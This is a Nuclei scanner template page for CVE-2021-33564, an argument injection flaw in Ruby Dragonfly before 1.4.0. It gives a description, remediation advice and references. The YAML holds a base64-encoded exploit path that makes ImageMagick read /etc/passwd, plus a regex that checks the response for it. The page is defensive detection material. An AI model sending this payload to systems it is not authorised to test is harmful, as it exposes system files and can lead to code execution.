Ruby Dragonfly <1.4.0 - Remote Code Execution
ID: CVE-2021-33564
Severity: critical
Author: 0xsapra
Tags: cve2021,cve,rce,ruby,injection,dragonfly_project
Description
Section titled “Description”Ruby Dragonfly before 1.4.0 contains an argument injection vulnerability that allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.
YAML Source
Section titled “YAML Source”id: CVE-2021-33564
info: name: Ruby Dragonfly <1.4.0 - Remote Code Execution author: 0xsapra severity: critical description: Ruby Dragonfly before 1.4.0 contains an argument injection vulnerability that allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade Ruby Dragonfly to version 1.4.0 or later to mitigate this vulnerability. reference: - https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/ - https://github.com/markevans/dragonfly/compare/v1.3.0...v1.4.0 - https://github.com/markevans/dragonfly/commit/25399297bb457f7fcf8e3f91e85945b255b111b5 - https://github.com/mlr0p/CVE-2021-33564 - https://nvd.nist.gov/vuln/detail/CVE-2021-33564 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-33564 cwe-id: CWE-88 epss-score: 0.07547 epss-percentile: 0.93983 cpe: cpe:2.3:a:dragonfly_project:dragonfly:*:*:*:*:*:ruby:*:* metadata: max-request: 2 vendor: dragonfly_project product: dragonfly framework: ruby tags: cve2021,cve,rce,ruby,injection,dragonfly_project
http: - method: GET path: - "{{BaseURL}}/system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==" - "{{BaseURL}}/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ=="
matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 4a0a00473045022100b7e2c15b3abc8d9a917007935cf61bc17dc5629676d054b64969f2b487940f320220370c771cfa41bd8e56c3ee44da4535b619c2972a434a7d6a004f6a11e38b22d3:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-33564.yaml"